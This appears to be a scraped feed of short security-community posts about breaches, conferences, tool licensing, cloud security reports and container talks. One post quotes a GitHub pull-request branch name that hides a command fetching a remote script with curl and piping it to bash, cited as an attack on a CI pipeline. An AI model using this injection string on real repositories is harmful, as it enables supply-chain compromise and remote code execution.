awesome HTML slides with live interaction!

Sweet!

All military aid from the U.S. to Ukraine from 2014-2024 has cost the U.S. tax payer $19.94 per person per year.

In return they got to destroy Russia’s entire Soviet equipment inheritance and still complain it is a bad deal

Safe.eth on X: "Investigation Updates and Community Call to Action" / X Investigation Updates and Community Call to Action

New details on the ByBit/Safe{Wallet} breach, and uhhh wow, some really silly blunders on the DPRK side. They still succeeded which is the most upsetting part of all of this. Let's bully some threat actor tradecraft! A🧵
x.com/safe/status/...

quick maths 60/4=15 hours per day, easy 🥵

Very interesting work!

Reminder that the Call for Presentations for Sikkerhetsfestivalen (The Security Festival) is open. OWASP Oslo is hosting an AppSec track. Scroll down the page for English version:

sikkerhetsfestivalen.no/alle-nyheter...

Seems like there's a bit of confusion around the recent @Semgrep licence change and the @opengrep fork and I think there are two key points to highlight.

1/10

yes, that one almost reads as it is a AI generated point. lol

I've spent dozens of hours reading State of Cloud Security reports

You know, the ones that use data from their CSPM product

And I've realized the findings substantially reflect how well that tool helps customers secure their clouds

I wrote up some examples, both good and bad (🔗 in 🧵)

Slides for the @bsideslondon.bsky.social container security workshop presented with @smarticu5.bsky.social and @marionmccune.bsky.social are here blog.iainsmart.co.uk/talks/BSides...

Picture of a Github PR with text reading openimbot wants to merge 0 commits into ultralytics:main from openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

absolutely incredible attack vector

any idea why CSRF is +5 since last year? I rarely see CSRF reports these days.

Modern solutions against cross-site attacks (frederikbraun.de/modern-solut...): An article about cross-site leak attacks and browser-based defenses. You will also learn why web security best practices is always opt-in and finally how YOU can get increased security controls.

This is a fascinating case study of real operational use of cryptography by non-technical people, of OPSEC, of anonymity tech, and of web security.

cw: drugs

How Tailscale's infrastructure team stays small Tailscale’s secure, simplified networking solution helps DevOps teams eliminate infrastructure headaches. Learn how our infra team of just three engineers uses Tailscale to handle networking, secrets,...

tailscale.com/blog/infra-t...

Awesome article by @tailscale.com team. It shows the good stuff that can happen if you take product design security and scalability from the get go. Kudos to the team, and I think at this point I should call myself a fanboy xD

I didn't know about setec. That's awesome

Awseye - See Inside AWS Accounts Awseye tracks publicly accessible AWS data to help identify and secure known and exposed AWS resources. Empowering defenders with open-source intelligence.

The self described “Shodan of AWS” is now live! This is an amazing project from Daniel Grzelak that helps democratize cloud resource enumeration for the masses. Very excited about this!
awseye.com

If you're looking for the security talks from Kubecon NA 2024, I've added the abstracts and Youtube embeds to talks.container-security.site/categories/#... .

There's also talks going back to 2016 in case you really want to watch a lot of container security videos!